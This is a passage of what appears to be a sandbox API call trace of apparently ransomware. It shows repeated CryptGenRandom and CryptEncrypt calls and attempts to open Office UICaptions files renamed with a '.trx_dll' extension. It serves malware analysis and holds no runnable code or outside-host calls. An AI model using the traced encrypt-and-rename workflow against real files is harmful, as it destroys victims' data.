GetProcessHeap () returned 0x2c0000 [0160.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.438] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9e8*=0x30) returned 1 [0160.438] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.438] GetProcessHeap () returned 0x2c0000 [0160.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.438] GetProcessHeap () returned 0x2c0000 [0160.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80460 | out: hHeap=0x2c0000) returned 1 [0160.438] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9f0 | out: pbBuffer=0x57e9f0) returned 1 [0160.438] GetProcessHeap () returned 0x2c0000 [0160.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.438] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9e8*=0x30) returned 1 [0160.438] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.438] GetProcessHeap () returned 0x2c0000 [0160.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.438] GetProcessHeap () returned 0x2c0000 [0160.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80388 | out: hHeap=0x2c0000) returned 1 [0160.439] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9e8 | out: pbBuffer=0x57e9e8) returned 1 [0160.439] GetProcessHeap () returned 0x2c0000 [0160.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.439] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9e0*=0x30) returned 1 [0160.439] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.439] GetProcessHeap () returned 0x2c0000 [0160.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.439] GetProcessHeap () returned 0x2c0000 [0160.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c802b0 | out: hHeap=0x2c0000) returned 1 [0160.439] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9e8 | out: pbBuffer=0x57e9e8) returned 1 [0160.439] GetProcessHeap () returned 0x2c0000 [0160.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.439] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9e0*=0x30) returned 1 [0160.439] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.439] GetProcessHeap () returned 0x2c0000 [0160.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.439] GetProcessHeap () returned 0x2c0000 [0160.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4318 | out: hHeap=0x2c0000) returned 1 [0160.440] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9e0 | out: pbBuffer=0x57e9e0) returned 1 [0160.440] GetProcessHeap () returned 0x2c0000 [0160.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.440] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9d8*=0x30) returned 1 [0160.440] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.440] GetProcessHeap () returned 0x2c0000 [0160.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.440] GetProcessHeap () returned 0x2c0000 [0160.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4238 | out: hHeap=0x2c0000) returned 1 [0160.440] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9e0 | out: pbBuffer=0x57e9e0) returned 1 [0160.440] GetProcessHeap () returned 0x2c0000 [0160.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.440] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9d8*=0x30) returned 1 [0160.440] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.440] GetProcessHeap () returned 0x2c0000 [0160.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.441] GetProcessHeap () returned 0x2c0000 [0160.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c801d8 | out: hHeap=0x2c0000) returned 1 [0160.441] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9d8 | out: pbBuffer=0x57e9d8) returned 1 [0160.441] GetProcessHeap () returned 0x2c0000 [0160.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.441] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9d0*=0x30) returned 1 [0160.441] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.441] GetProcessHeap () returned 0x2c0000 [0160.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.441] GetProcessHeap () returned 0x2c0000 [0160.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80100 | out: hHeap=0x2c0000) returned 1 [0160.441] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9d8 | out: pbBuffer=0x57e9d8) returned 1 [0160.441] GetProcessHeap () returned 0x2c0000 [0160.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.441] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9d0*=0x30) returned 1 [0160.441] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.442] GetProcessHeap () returned 0x2c0000 [0160.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.442] GetProcessHeap () returned 0x2c0000 [0160.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80028 | out: hHeap=0x2c0000) returned 1 [0160.442] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9d0 | out: pbBuffer=0x57e9d0) returned 1 [0160.442] GetProcessHeap () returned 0x2c0000 [0160.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.442] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9c8*=0x30) returned 1 [0160.442] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.442] GetProcessHeap () returned 0x2c0000 [0160.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.442] GetProcessHeap () returned 0x2c0000 [0160.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4158 | out: hHeap=0x2c0000) returned 1 [0160.442] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9d0 | out: pbBuffer=0x57e9d0) returned 1 [0160.442] GetProcessHeap () returned 0x2c0000 [0160.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.443] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9c8*=0x30) returned 1 [0160.443] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.443] GetProcessHeap () returned 0x2c0000 [0160.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.443] GetProcessHeap () returned 0x2c0000 [0160.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7ff50 | out: hHeap=0x2c0000) returned 1 [0160.443] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9c8 | out: pbBuffer=0x57e9c8) returned 1 [0160.443] GetProcessHeap () returned 0x2c0000 [0160.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.443] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9c0*=0x30) returned 1 [0160.443] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.444] GetProcessHeap () returned 0x2c0000 [0160.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.444] GetProcessHeap () returned 0x2c0000 [0160.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4078 | out: hHeap=0x2c0000) returned 1 [0160.444] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9c8 | out: pbBuffer=0x57e9c8) returned 1 [0160.444] GetProcessHeap () returned 0x2c0000 [0160.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.444] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9c0*=0x30) returned 1 [0160.444] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.444] GetProcessHeap () returned 0x2c0000 [0160.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.444] GetProcessHeap () returned 0x2c0000 [0160.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7fe78 | out: hHeap=0x2c0000) returned 1 [0160.444] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9c0 | out: pbBuffer=0x57e9c0) returned 1 [0160.444] GetProcessHeap () returned 0x2c0000 [0160.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.445] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9b8*=0x30) returned 1 [0160.445] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.445] GetProcessHeap () returned 0x2c0000 [0160.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.445] GetProcessHeap () returned 0x2c0000 [0160.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3f98 | out: hHeap=0x2c0000) returned 1 [0160.445] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9c0 | out: pbBuffer=0x57e9c0) returned 1 [0160.445] GetProcessHeap () returned 0x2c0000 [0160.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.445] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9b8*=0x30) returned 1 [0160.445] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.445] GetProcessHeap () returned 0x2c0000 [0160.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.445] GetProcessHeap () returned 0x2c0000 [0160.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3eb8 | out: hHeap=0x2c0000) returned 1 [0160.446] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9b8 | out: pbBuffer=0x57e9b8) returned 1 [0160.446] GetProcessHeap () returned 0x2c0000 [0160.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.446] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9b0*=0x30) returned 1 [0160.446] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.446] GetProcessHeap () returned 0x2c0000 [0160.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.446] GetProcessHeap () returned 0x2c0000 [0160.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3cf8 | out: hHeap=0x2c0000) returned 1 [0160.446] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9b8 | out: pbBuffer=0x57e9b8) returned 1 [0160.446] GetProcessHeap () returned 0x2c0000 [0160.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.446] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9b0*=0x30) returned 1 [0160.446] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.447] GetProcessHeap () returned 0x2c0000 [0160.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.447] GetProcessHeap () returned 0x2c0000 [0160.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7fbf0 | out: hHeap=0x2c0000) returned 1 [0160.447] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9b0 | out: pbBuffer=0x57e9b0) returned 1 [0160.447] GetProcessHeap () returned 0x2c0000 [0160.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.447] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9a8*=0x30) returned 1 [0160.447] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.447] GetProcessHeap () returned 0x2c0000 [0160.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.447] GetProcessHeap () returned 0x2c0000 [0160.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3c18 | out: hHeap=0x2c0000) returned 1 [0160.447] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9b0 | out: pbBuffer=0x57e9b0) returned 1 [0160.447] GetProcessHeap () returned 0x2c0000 [0160.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.447] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9a8*=0x30) returned 1 [0160.448] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.448] GetProcessHeap () returned 0x2c0000 [0160.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.448] GetProcessHeap () returned 0x2c0000 [0160.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7fb18 | out: hHeap=0x2c0000) returned 1 [0160.448] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9a8 | out: pbBuffer=0x57e9a8) returned 1 [0160.448] GetProcessHeap () returned 0x2c0000 [0160.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.448] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9a0*=0x30) returned 1 [0160.448] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.448] GetProcessHeap () returned 0x2c0000 [0160.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.448] GetProcessHeap () returned 0x2c0000 [0160.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7fa40 | out: hHeap=0x2c0000) returned 1 [0160.449] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9a8 | out: pbBuffer=0x57e9a8) returned 1 [0160.449] GetProcessHeap () returned 0x2c0000 [0160.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.449] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9a0*=0x30) returned 1 [0160.449] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.449] GetProcessHeap () returned 0x2c0000 [0160.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.449] GetProcessHeap () returned 0x2c0000 [0160.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3b38 | out: hHeap=0x2c0000) returned 1 [0160.449] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9a0 | out: pbBuffer=0x57e9a0) returned 1 [0160.449] GetProcessHeap () returned 0x2c0000 [0160.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.449] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e998*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e998*=0x30) returned 1 [0160.449] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.449] GetProcessHeap () returned 0x2c0000 [0160.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.450] GetProcessHeap () returned 0x2c0000 [0160.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3a58 | out: hHeap=0x2c0000) returned 1 [0160.450] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9a0 | out: pbBuffer=0x57e9a0) returned 1 [0160.450] GetProcessHeap () returned 0x2c0000 [0160.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.450] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e998*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e998*=0x30) returned 1 [0160.450] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" 